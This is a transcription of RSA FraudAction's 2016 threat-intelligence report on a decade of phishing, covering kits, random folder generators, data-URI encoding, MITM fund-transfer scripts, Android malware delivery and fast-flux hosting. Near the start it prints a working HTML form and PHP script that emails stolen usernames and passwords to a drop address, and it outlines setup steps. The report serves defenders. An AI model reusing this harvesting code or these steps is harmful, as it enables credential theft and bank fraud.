RSA FraudAction Intelligence A DECADE OF PHISHING. November 2016

Transcription

1 RSA FraudAction Intelligence A DECADE OF PHISHING November 2016

2 TABLE OF CONTENTS Introduction... 3 How to Set up a Phishing Campaign... 3 Fundamentals... 3 How Does Phishing Work in the Real World?... 4 Motivation - How Do fraudsters Cash Out?... 5 The Many Schemes and Techniques of Phishing... 5 The Tax Refund Ploy - Multi-branded Phishing... 5 Bulk Phishing Campaigns... 5 Random Folder Generators... 6 Local HTML Scheme... 8 BASE64 encoded Phishing in a URL... 9 Phishing with MITM capabilities... 9 Phishing Plus Mobile Malware in India Fast-Flux Phishing Additional Phishing Techniques

3 INTRODUCTION Our RSA FraudAction forensic analyst looks back on a decade of phishing campaigns that we have investigated, and also explains the techniques and inner workings of some recently seen schemes. HOW TO SET UP A PHISHING CAMPAIGN There is nothing complicated about setting up a phishing campaign. Phishing sites, like any website, require a hosting facility (domain, IP address, etc.) as well as a software front-end and back-end (HTML, PHP etc.). Anyone with a little knowledge in web-development can set up a phishing site without a hassle. Simple phishing sites are generally simple copies of legitimate customer login pages (front-end), where the action script (that handles the submitted information) is different from the legitimate one. Owing to this simplicity in the preparation process, phishing was, is, and will probably remain one of the most desirable scam techniques performed by fraudsters. FUNDAMENTALS What you see in a website is usually composed in HTML (Hyper-Text Markup Language) with the help of additional client-side scripting/markup languages such as JavaScript and CSS. These components are responsible for presenting text, pictures, and other graphics. In addition, PHP (Hypertext Preprocessor) scripts are normally involved to handle the exchange of data and to perform programming tasks, and fraudsters love it! PHP is a relatively simple to write server-side scripting language, and it is used by most websites today. In every phishing site, there is an information form that victims are prompted to fill with requested details. In HTML, forms are composed like the following example: <form method= POST action= getdata.php > Username: <input type= text name= username /> <br/> Password: <input type= password name= password /> <br/><br/> <input type= submit value= Login /> </form> The example login form above contains two data fields: Username and Password, defined by the input tag. The third input has a type defined as submit with a value defined as Login this means that it will appear on the login screen as a submit button labeled Login. The form tags at the beginning and end of the script define a form with these fields. The form tag attributes method and action determine how the data is going to be handled when victim clicks the Login button the data will be submitted to the getdata.php handling script via an HTTP POST request. How do fraudsters usually prepare all of the above? They copy the HTML source code of a legitimate site s pages, and change the action attribute to a script they ve written (usually in PHP). The easy method is just to get the submitted data and forward it to fraudster s address (a.k.a. the drop ). Here s an example of a getdata.php script: <?php $username = $_POST[ username ]; $password = $_POST[ password ]; 3

4 $message = -----[Best HaXoR Ever]-----\n ; $message.= Username: $username\n ; $message.= Password: $password\n ; $message.= -----[Best HaXoR Ever]-----\n ; $subject = Phished data ; mail( besthaxor@drop .com, $subject, $message);?> Although most phishing sites still work in this simplified manner, during the last decade we ve seen more advanced phishing techniques develop and evolve. HOW DOES PHISHING WORK IN THE REAL WORLD? Being a simple way to do fraud, phishing usually doesn t attract sophisticated threat actors. In some cases, they don t even possess any programming knowledge. Phishing sites are commonly distributed in underground forums as kits packaged as archive files (ZIP, RAR, etc.) that contain all the resources needed to deploy a working phishing site. Fraudsters simply configure their drop s in the relevant files of the kit. It is very comfortable and easy for them to use. However, distributors or kit developers don t spend their precious time just to make their clients the fraudsters happy. Many of the kits we have investigated contain hidden or obfuscated code that forwards the stolen data back to the kit s author as well as to the end-user fraudster. So, for example, if 100 fraudsters use these infected kits distributed by single kit author, he stands to harvest all the data stolen by 100 fraudsters, avoiding all the hard work of deploying the kit online 100 times himself. Once a kit is developed or obtained in the underground, fraudsters need to deploy it in order to make it available online. Here are two commonly used options for deployment: Use a hacked website Buy a site/domain The first option is usually the more prevalent one. To obtain a hacked website, a fraudster either hacks it himself, or buys it in underground forums/shops selling compromised sites. The vendor of such a site provides the fraudster with a link to a backdoor script (also in PHP) also known as a shell that allows them to control and manage the site, uploading and deploying the phishing kit resources. When a fraudster has the phishing URL ready (deployed kit on hijacked website), he needs to distribute it to potential victims. Distribution of phishing URLs is commonly performed via messages. However, occasionally fraudsters can be more creative and use additional distribution vehicles, such as the Google advertisement platform, Facebook, Twitter, etc. Lists of addresses are traded and sold in underground forums, and often the price depends on how good that list is. For example, how close a match there is between the addresses of people from a geographic area that matches the targeted entity, and how many of them are active or online, can affect the price. If fraudster is targeting a British bank, a verified active address owned by British citizens will fetch a higher price. 4

5 MOTIVATION - HOW DO FRAUDSTERS CASH OUT? Not every financial institution becomes a fraudster s target. The main qualifying factor is either a security flaw in the target site, and/or the ease of cashing out or monetizing the phishing process. For example, knowing that phishing for PII (Personally Identifiable Information) data such as mother s maiden name and date of birth tied together with other personal details can help in transferring money from a victim s account elsewhere - will definitely draw a scammer s attention. Another option is fraudsters selling stolen data in the underground rather than trying to cash-out the scam by themselves. This also offers the advantage of avoiding drawing attention from law enforcement authorities and company security departments. The buyers are usually people who are well versed with how to cash-out, and are also willing to take on the risks involved. One more option is fraudsters collaborating with money-mules. The money is transferred to a mule account, and the money mule cashes it out for a fee. After the transfer is done, the mules go to an ATM, draw the stolen money, and transfer it back to the first fraudster via a money transferring service (Western Union, MoneyGram etc.). Another cashout scheme is purchasing various products online using stolen credentials, and then re-selling the items. These are just few examples of common cashout techniques. THE MANY SCHEMES AND TECHNIQUES OF PHISHING THE TAX REFUND PLOY - MULTI-BRANDED PHISHING One phishing scam that Phishers love to use is to bait victims with a supposed tax refund notification via - pretending to come from an official government tax/revenue service in different countries. When victims follow the link, they see a phishing website that has the same look and feel of the legitimate revenue service site of their country, with a list of all the banks in that region. The victim is prompted to select their bank and enter personal information to receive a refund. This ploy enables fraudsters to steal data from customers at several banks at once and increase their fraud coverage. BULK PHISHING CAMPAIGNS Another popular trend is performing phishing campaigns in bulk form. This means that rather than deploying a single phishing website that is eventually sent to victims, fraudsters deploy them in bulk, and distribute URLs randomly among phishing s. This tactic increases the phishing site s lifespan and makes the detection and shutdown process a bit harder. Contrary to a usual phishing site where the scammers use one or two hijacked websites to deploy a phishing kit, the bulk scheme could encompass dozens of hijacked websites with several phishing directories on each one, resulting in hundreds of phishing websites. For example:

6 Detecting one or two of these URLs and shutting them down can still leave other URLs online. The randomly generated folder names in these phishing URLs makes them much harder to detect. Needless to say, when fraudsters host the phishing attacks on domains that they bought, it complicates the handling of such attacks as there is little or no cooperation from domain registrants in trying to shut down phishing sites. On the other hand, hijacked website registrants are often more willing to cooperate and cease the abuse of their websites. These phishing campaigns are often orchestrated by several threat actors. RANDOM FOLDER GENERATORS Some of the newer phishing kits have been observed to generate a new randomized phishing URI for each new victim accessing the primary phishing link. The victims receive a link (by or another distribution method) the redirects them to a folder-generating script. Once the victim accesses the link, a fresh (URI) folder is generated on the fly, resulting in a personal phishing site dedicated to this instance and this victim. The folders are usually named with a random sequence of characters, often using the IP address or address of the victim. In some cases, the entire folder is deleted as soon as the victim completes entering all of the requested personal information, and the data is sent off to a phishing drop site or address. 6

7 Here is a generic example - the initial link in the phishing looks like this: The PHP code in the snapshot below is an example of a random folder-generating script. Random name generating function Randomize the name some more Logging every access in file including IP, date, and browser type File copying function Base directory - contents are copied from here Copy the contents to generated folder and redirect to it index.php is a PHP script that creates a random folder and copies all the required resource files from the phishing kit (html, js, css, images, etc.) to a newly created folder per victim access. In some cases, instead of a new folder, the index.php script extracts these files from a ZIP archive sitting in the base directory of the phishing campaign, and deploys them as is, using the name of the archive folder. Phishing Victim follows a folder-generating URL Foldergenerating script New randomly-named folder is generated Required files are copied from base directory to new folder Victim is redirected to newly generated URL Newly generated folder Phishing site is presented to victim 7

8 This scheme is simple to operate, but it complicates detection and shutdown efforts much like other schemes described here. When one randomly deployed phishing URL is detected, it might be deleted in minutes, which can mislead security personnel into thinking that the site has been brought down. In actual fact, the site remains active and online, simply waiting for a new victim to access the initial link. In order to handle these cases effectively, it is crucial to detect and shutdown the base directory (or archive) that contains initial phishing site and resources. LOCAL HTML SCHEME The phishing scheme that is commonly called Local HTML involves an HTML file that is attached to an message. Victims are prompted to open it and fill out their personal data. The phishing site contents are placed in a single HTML file (except for the data handling script and drop point URL that are incorporated in the form tag action attribute described earlier). The script can be hosted by an online form-handling service, or as a PHP script hosted on a hijacked website. In both cases, the data is usually sent to the fraudster s drop . Below is a snapshot of Part of a Local HTML contents (form) with a remote drop point URL From a cyber-security perspective, it may be difficult to shut-down the site when the drop script is hosted on a hijacked website, as it doesn t present any abusive content when it is viewed (a blank page is normally displayed), causing hosting facilities to think it is offline. On the other hand, online form services are more cooperative in shutting down fraudster accounts. 8

9 BASE64 ENCODED PHISHING IN A URL Most major browsers today support a feature called data URI scheme. This feature enables encoding the webpage content with BASE64 encoding into a string seen in browser address bar. Fraudsters like using this encoding feature in the Local HTML phishing scheme, as well as in regular online hosted phishing. When hosted online, it helps scammers to conceal the main phishing URL. The data URI is injected into the address bar using the JavaScript s window.location property or the HTML meta-refresh. The screenshot below shows the data URI as it appears in address bar. This is an example of the script for injecting the data URI into the browser address bar. PHISHING WITH MITM CAPABILITIES Phishing schemes with Man-In-The-Middle (MitM) capabilities are more sophisticated than most, and provide fraudsters with more accurate harvested credentials. Phishing with MITM means that while the victim is interacting with a phishing site, behind the scenes and not visible to the victim, the phishing site communicates with and performs actions on the legitimate site. This capability is implemented with PHP curl module. The curl is used to transfer data through various protocols including HTTP. To develop a script that imitates the user s actions on a legitimate site, some reverse engineering is required on the part of the fraudster to understand which requests and data are forwarded to the legitimate site. 9

10 Below is a code sample illustrating the curl object used for communicating with the legitimate online-banking site. The script in the snapshot below is a curl class used for communicating with the legitimate online banking site via an HTTP proxy (xxx.xxx.xxx.xxx:8080). 10

11 The config.php in the snapshot below contains the fraudster s account used to receive the stolen funds transfer. Another part of the phishing script, seen below, uses the curl object to transfer funds from the victim s account to the fraudster s account ($cuenta_destino is defined in the config.php shown above) The MITM phishing scheme offers a fraudster many advantages the fraudster can: Login to the legitimate site to check the validity of stolen credentials Browse the victim s account after login to view the account balance Grab additional personal information such as phone number, address, etc. In addition, the MITM scheme can be used in combination with an HTTP proxy to hide the phishing site s original IP address and use the desired country IP to match that of the victim s locale. This results in a low profile in fraud monitoring system logs that flag suspicious activity if actions carried out on the legitimate site are detected as originating from a region other than the customer s or the financial institution s website locale. Moreover, there are cases where the phishing kit checked the victim s account balance, and when it was higher than a given amount, it transferred the funds to a mule account at the same bank through the legitimate site. These kits/phishing sites are relatively rare as they require higher level coding skills and reverse engineering of the legitimate websites. In the best case scenario, MITM phishing only steals valid credentials. In the worst case scenario, the funds in the account are transferred out almost instantly, making it a very serious threat in cyber-space. 11

12 PHISHING PLUS MOBILE MALWARE IN INDIA Forensic analysts at RSA recently investigated a new phishing trend targeting banks in India. The Tax Refund scheme described earlier, that operates via a spoofed government revenue service site, was recently modified to include an SMS message sent to the victim s phone at the end of the phishing process. The SMS contains a link that downloads and deploys a malicious APK (Android mobile malware archive). Phishing Victim clicks on redirection link Redirection Victim is redirected to outer-frame URL The redirecting source-code is obfuscated with Unescape Redirecting code executes using data URI Outer-frame Communicates with SQL database to get inner-frame URL Presents inner-frame hosted on URL different from outer-frame Inner-frame (foldergenarator) Randomly named folder is generated in random parent directory Victim is redirected to a new folder Phishing site Victim is prompted to select a bank Victim is prompted to enter personal data including phone number Compromised data is sent to remote drop URL Victim receives short-url link via SMS The link leads to URL for downloading malicious Andoid application Once APK is installed, victim's data on smartphone iscompromised This new ploy makes use of a number of schemes and techniques described earlier, including a random folder generator, BASE64 data URI, tax-refund scheme, and more. The link provided in the phishing s leads victims to a redirection URL (performed via the BASE64 data URI). That URL leads to an outer-frame site, using a script that communicates with a remote SQL database to retrieve the inner-frame URL. 12

13 The snapshot below shows part of the outer-frame code communicating with a remote SQL database. The inner-frame phishing URL generates a random folder in a random parent directory, which is different from the usual folder-generators that create a new folder under the same path. The phishing site prompts the victims to choose their bank from a long list of Indian banks to begin the tax-refund process. The image below shows the bank selection screen in the phishing site. 13

14 The kit uses a configuration file containing URLs for the resources needed by the phishing site: A URL to provide all of the images needed to spoof the legitimate site, instead of grabbing the images from the legitimate site which can trigger detection A drop URL that receives and logs stolen data A URL with the SMS sending script for the malicious APK A short URL that is sent to victims The last page file that victims see at the end of the phishing process The code snapshot below is an example of the phishing site configuration file. Once the victim finishes going through all the phishing pages, the folder is deleted. To add further spice to this scheme, upon entering their phone number in this site, the victim receives an SMS message with a link prompting the download of a malicious APK file (Android application) under the pretense of mobile verification. The random URL generation where links are deleted and created per victim complicates detection and shut-down by cyber security services. The impact of this trend is beyond regular phishing, since at the end of the process, the victim s phone is infected by a malicious application. That mobile malware application keeps on stealing data from the phone long after the personal data has been phished via a simple phishing site. Since many banks today employ two-factor authentication using SMS messages for online banking, this malicious app can be even more harmful allowing the fraudster control over the phone and the second channel for authentication. 14

15 FAST-FLUX PHISHING One of the oldest and most sophisticated phishing schemes that RSA analysts have investigated are commonly called Fast-Flux phishing (also known as MS-Redirect, Rock-Phish, and O-late). These are usually phishing sites hosted on Fast-Flux networks phishing attack domains that are hosted at multiple IP addresses that are randomly changed over a period of minutes. Therefore, in order to bring down these attacks, our analysts can only contact the registrars, as contacting the ISP/Hosting would not help to get to the root problem. Domains are often generated automatically in this scheme for the sole purpose of hosting phishing and malware. Each domain contained dozens of URLs targeting several entities, making campaigns very profitable for the scam authors. Like any kind of Fast-Flux, the infrastructure (multiple IP addresses) is based on large botnets many infected zombie computers. It involves a DNS with short TTL of its records in order to achieve IP addresses randomization. This scheme is not as common recently as it was in the past. 15

16 ADDITIONAL PHISHING TECHNIQUES In addition to the more notable and prevalent phishing schemes we have described, there are a few more techniques that are available in the phishing arsenal that are not as well known, but are still out there and are worth noting. Filtering by Geolocation and Address Some phishing attacks are focused on victims with specific criteria, like geolocation. For instance, our analysts have witnessed phishing sites that validate their victims by comparing their address with a long list of confirmed addresses for a certain region that the fraudster obtained earlier. Some phishing s are sent with addresses embedded in the URL s parameters to make sure that only the people who received the phishing will be able to access the fraudulent site. Make sure victim s address is set in id parameter, otherwise phishing won t be shown Check whether the is in the list Check whether it is a returning victim Put it in ignore list to avoid access for second time If it passed the test, redirect to phishing page 16

17 Collecting Statistics Statistics collection is another popular feature fraudsters like to implement in their attacks. Sometimes, it is done using online services, but most of the time this feature is incorporates as part of a phishing kit. User information like screen resolution, IP address, language preferences in the browser, etc. allows fraudsters to mimic a victim s online fingerprint to try and login to their online accounts, avoiding detection of online-security monitoring solutions deployed in legitimate websites. 17

18 The 419 Scam The 419 (Nigerian) scam is one of the oldest fraud schemes on the internet. And surprisingly, enough people still fall victim to this simple and often humorous fictional cover story that purportedly offers to share millions of dollars with the victim, if only they first provide a small deposit to start the process Now, in order to add greater believability or a trust factor to this scam, fraudsters developed sites that imitate online banking, where the victims are given a set of prepared account credentials to login. Usually, their name is displayed after they login, and they can see that there are thousands or millions of dollars in their account. Once they gain this little measure of the victim s trust, the rest of the standard 419 scam can be played out more easily. Smartphones Always At Our Side We are now living in the smartphone era, where all sorts of tiny mobile devices with vast computing and communication abilities are always at our side fraudsters take into consideration that victims are now more attached to their than ever before. Many of us check our messages much more frequently, especially if we have a notification sound set on our device. And accordingly, more and more fraudsters modify their phishing sites to accommodate mobile browsers. Therefore, despite the rising awareness of online fraud in the general population and the media, phishing remains one of the most dangerous cyber-threats. 18

19 ABOUT RSA RSA helps more than 30,000 customers around the world take command of their security posture by partnering to build and implement business-driven security strategies. With RSA's award-winning cybersecurity solutions, organizations can effectively detect and respond to advanced attacks; manage user identities and access; and reduce business risk, fraud and cybercrime. For more information, go to ABOUT RSA FRAUDACTION RSA FraudAction is a managed threat intelligence service which provides global organizations with 24x7 protection and shutdown against phishing, malware, rogue mobile apps and other cyber attacks that impact their business. Supported by 150 analysts in RSA s Anti-Fraud Command Center, the RSA FraudAction service analyzes millions of potential threats every day and has enabled the shutdown of more than one million cyber attacks. EMC2, EMC, the EMC logo, RSA, and the RSA logo, are registered trademarks or trademarks of EMC Corporation in the United States and other countries. VMware is a registered trademark or trademark of VMware, Inc., in the United States and other jurisdictions. Copyright 2016 EMC Corporation. All rights reserved. Published in the USA.